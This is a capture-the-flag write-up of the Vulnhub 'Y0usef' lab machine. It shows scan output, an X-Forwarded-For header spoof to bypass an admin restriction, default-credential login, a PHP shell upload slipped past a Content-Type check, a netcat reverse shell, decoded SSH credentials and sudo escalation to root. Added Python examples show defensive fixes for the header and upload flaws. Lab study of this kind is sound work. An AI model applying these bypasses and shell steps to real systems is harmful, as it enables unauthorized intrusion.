
Vulnhub: detailed walkthrough of the Y0usef target machine

Posted: 2022-12-07 11:46:07  Views: 40
Tags: http yousef Y0usef kali 192.168 56.247 Vulnhub target-machine root

Y0usef

Author: jason_huawen

Basic information about the target machine

Name: y0usef: 1

Address:

https://www.vulnhub.com/entry/y0usef-1,624/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:66:82:69      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.247  08:00:27:ca:39:d0      1      60  PCS Systemtechnik GmbH    

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.247.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 21:36 EST
Nmap scan report for localhost (192.168.56.247)
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
|   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
|   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 08:00:27:CA:39:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds

The NMAP scan shows that the target has two open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247                                     
<html>
<head>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">

<body>
<div class="container-fluid">
<center class="mt-5">
<h1>Sorry , the site is under construction soon, it run </h1>
</center>
</div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script>
</head>
</html>                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247/robots.txt                          
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Ubuntu) Server at 192.168.56.247 Port 80</address>
</body></html>
                                 

Visiting port 80 in a browser returns the default Apache2 page, and there is no robots.txt file. Next, run a directory scan:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ nikto -h http://192.168.56.247    
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.247
+ Target Hostname:    192.168.56.247
+ Target Port:        80
+ Start Time:         2022-12-06 21:40:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-12-06 21:41:29 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.247
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/06 21:39:13 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 302]
Progress: 218995 / 220561 (99.29%)===============================================================
2022/12/06 21:39:36 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.247
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2022/12/06 21:39:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.php            (Status: 200) [Size: 791]
/.html                (Status: 403) [Size: 294]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1102787 / 1102805 (100.00%)===============================================================
2022/12/06 21:41:55 Finished
===============================================================

So far the scans have found no directories or files. This may be because the default scan filters out certain status codes, and the directories that return them often require authentication. So gobuster needs to be told explicitly which response status codes to report, in order to get more information:

200 (OK): the server processed the request successfully. Usually this means the server served the requested page.
204 (No Content): the server processed the request successfully but returned no content.
301 (Moved Permanently): the requested page has moved permanently to a new location. When the server returns this response (to a GET or HEAD request), it automatically redirects the requester to the new location.
302 (Found): the server is currently answering the request from a page at a different location, but the requester should keep using the original location for future requests.
307 (Temporary Redirect): the server is currently answering the request from a page at a different location, but the requester should keep using the original location for future requests.
401 (Unauthorized): the request requires authentication. The server may return this response for pages that require a login.
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401
Error: error on parsing arguments: status-codes ("200,204,301,302,307,401") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   302,307,401,200,204,301
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:50:43 Starting gobuster in directory enumeration mode
===============================================================
Progress: 219246 / 220561 (99.40%)===============================================================
2022/12/06 21:51:09 Finished
===============================================================

Still no directories found; switch to a different wordlist:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist '' 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes:   200,204,301,302,307,401
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:52:00 Starting gobuster in directory enumeration mode
===============================================================
/.                    (Status: 200) [Size: 791]
/adminstration        (Status: 301) [Size: 324] [--> http://192.168.56.247/adminstration/]
Progress: 118867 / 119601 (99.39%)===============================================================
2022/12/06 21:52:14 Finished
===============================================================

This time the scan finds the /adminstration directory. Visiting it returns Forbidden, which confirms the earlier guess. Continue by scanning its subdirectories:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247/adminstration/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist '' 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247/adminstration/
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes:   204,301,302,307,401,200
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:56:02 Starting gobuster in directory enumeration mode
===============================================================
/include              (Status: 301) [Size: 332] [--> http://192.168.56.247/adminstration/include/]
/logout               (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/logout/]
/upload               (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/upload/]
/users                (Status: 301) [Size: 330] [--> http://192.168.56.247/adminstration/users/]
/bootstrap            (Status: 301) [Size: 334] [--> http://192.168.56.247/adminstration/bootstrap/]

Visiting these directories gives no error or forbidden response this time, but no content either. Try adding an X-Forwarded-For header pointing at localhost to bypass the restriction: intercept the request with Burp Suite and add X-Forwarded-For: localhost.

Now when /adminstration is requested, the Firefox extension X-Forwarded-For Header can be used to attach a valid X-Forwarded-For header to every page request, and the login page is returned.
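The bypass above works because the application treats a client-supplied X-Forwarded-For value as the real client address. As an added example that is not part of the original post (the trusted-proxy list, header values and sample requests are constructed), here is a naive resolver beside a hardened one that only honours the header when the TCP peer is a known proxy:

```python
"""Added example, not from the original post: why an access check keyed on
X-Forwarded-For is spoofable, and how to derive the client address safely.
TRUSTED_PROXIES and the sample requests below are constructed."""
import ipaddress

# Constructed: the only peers allowed to set X-Forwarded-For on our behalf
TRUSTED_PROXIES = {"10.0.0.5"}

def client_ip_naive(remote_addr, headers):
    """Weak: returns whatever the client put in X-Forwarded-For.
    This is the pattern the /adminstration check appears to use."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip_hardened(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    then take the right-most hop that is not itself a trusted proxy."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if hop in TRUSTED_PROXIES:
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed value such as "localhost"
        return hop
    return remote_addr

def is_local(ip):
    """Loopback test; the string fallback only matters for the naive path,
    which can hand us a non-IP such as "localhost"."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return ip == "localhost"

def admin_allowed(remote_addr, headers, resolver):
    """Admin area is meant to be reachable from the local host only."""
    return is_local(resolver(remote_addr, headers))

# Constructed request: a LAN client spoofing the header, as in the walkthrough
SPOOFED = {"X-Forwarded-For": "localhost"}
print(admin_allowed("192.168.56.206", SPOOFED, client_ip_naive))     # True
print(admin_allowed("192.168.56.206", SPOOFED, client_ip_hardened))  # False
```

The same rule applies at the web server layer: Apache's mod_remoteip only rewrites the client address for peers listed in RemoteIPTrustedProxy, which is the configuration equivalent of the hardened resolver.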

Testing weak credentials shows the login is admin / admin.

Next, try to upload shell.php. The server responds "file not allowed", so the upload check has to be bypassed.

Intercepting the request with Burp Suite and changing the Content-Type to image/jpg works (image/jpeg does not).

提示上传成功:file uploadad files/1670382468shell.php
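The uploader evidently decides on the client-supplied Content-Type alone, so any file labelled image/jpg passes. As an added example that is not part of the original post (file names, byte samples and the random storage name are constructed), here is that weak check beside a validator that relies on an extension allowlist and the file's own leading bytes instead:

```python
"""Added example, not from the original post: Content-Type-only upload check
beside a hardened validator. All sample uploads below are constructed."""
import os
import re
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Leading bytes a genuine file of each allowed type must start with
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}

def accept_weak(filename, content_type, data):
    """Trusts the client-supplied Content-Type and ignores name and bytes.
    Mirrors the behaviour seen in the walkthrough: image/jpg passes."""
    return content_type == "image/jpg"

def accept_hardened(filename, content_type, data):
    """Extension allowlist plus magic-byte check. Content-Type is ignored
    because the client controls it entirely."""
    base = os.path.basename(filename)
    if base.count(".") != 1:            # rejects "shell.php.jpg" and bare names
        return False
    name, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED_EXT or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return False
    return data.startswith(MAGIC[ext])

def stored_name(filename):
    """Never keep the client's name: random basename, validated extension."""
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed uploads: a PHP file relabelled as in the post, and a real JPEG header
PHP_UPLOAD = ("shell.php", "image/jpg", b"<?php /* constructed placeholder */ ?>")
JPEG_UPLOAD = ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF")

if __name__ == "__main__":
    print(accept_weak(*PHP_UPLOAD), accept_hardened(*PHP_UPLOAD))    # True False
    print(accept_hardened(*JPEG_UPLOAD), stored_name(JPEG_UPLOAD[0]))  # True <random>.jpg
```

Storing uploads outside the document root, or under a directory where the PHP handler is disabled, closes the remaining gap even if a check is later weakened.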

Requesting that file gives a shell:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 55915
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
 06:11:11 up 37 min,  0 users,  load average: 0.00, 0.13, 0.49
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@yousef-VirtualBox:/$ ls
ls
bin   cdrom  etc   initrd.img  lost+found  mnt  proc  run   srv  tmp  var
boot  dev    home  lib         media       opt  root  sbin  sys  usr  vmlinuz
www-data@yousef-VirtualBox:/$ cd home
cd home
www-data@yousef-VirtualBox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  3 root   root   4.0K Dec  6  2020 .
drwxr-xr-x 22 root   root   4.0K Nov 25  2020 ..
-rw-r--r--  1 root   root     53 Dec  8  2020 user.txt
drwxr-xr-x 18 yousef yousef 4.0K Dec  8  2020 yousef
www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
www-data@yousef-VirtualBox:/home$ 

Privilege escalation

The user.txt file found under /home is base64-encoded; decode it:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d            
ssh : 
user : yousef 
pass : yousef123                                                                                                                              

This gives the password of user yousef; log in over SSH as that user.

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ ssh [email protected]              
The authenticity of host '192.168.56.247 (192.168.56.247)' can't be established.
ED25519 key fingerprint is SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.247' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

778 packages can be updated.
482 updates are security updates.

Last login: Tue Dec  8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef: 
Matching Defaults entries for yousef on yousef-VirtualBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
    (ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo /bin/bash
root@yousef-VirtualBox:~# cd /root
root@yousef-VirtualBox:/root# ls -alh
total 24K
drwx------  2 root root 4.0K Dec  8  2020 .
drwxr-xr-x 22 root root 4.0K Nov 25  2020 ..
-rw-------  1 root root  235 Dec  8  2020 .bash_history
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  105 Dec  8  2020 root.txt
root@yousef-VirtualBox:/root# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:/root# 

This gives a root shell and the root flag.

Lessons learned

  1. The first instinct was right: the NMAP scan showed only ports 22 and 80, so the entry point had to be port 80.

  2. If a regular directory scan returns nothing, consider whether status codes are being filtered out, since some directories require authentication before they can be accessed. Add the corresponding parameters so those results are reported, and also consider switching wordlists.

  3. The X-Forwarded-For browser extension can be used to add or modify that header in the browser's requests.

  4. When working around a file upload check, observe closely how a normal, successful upload behaves. In this case the Content-Type had to be changed to image/jpg; image/jpeg did not upload.

From: https://www.cnblogs.com/jason-huawen/p/16962612.html
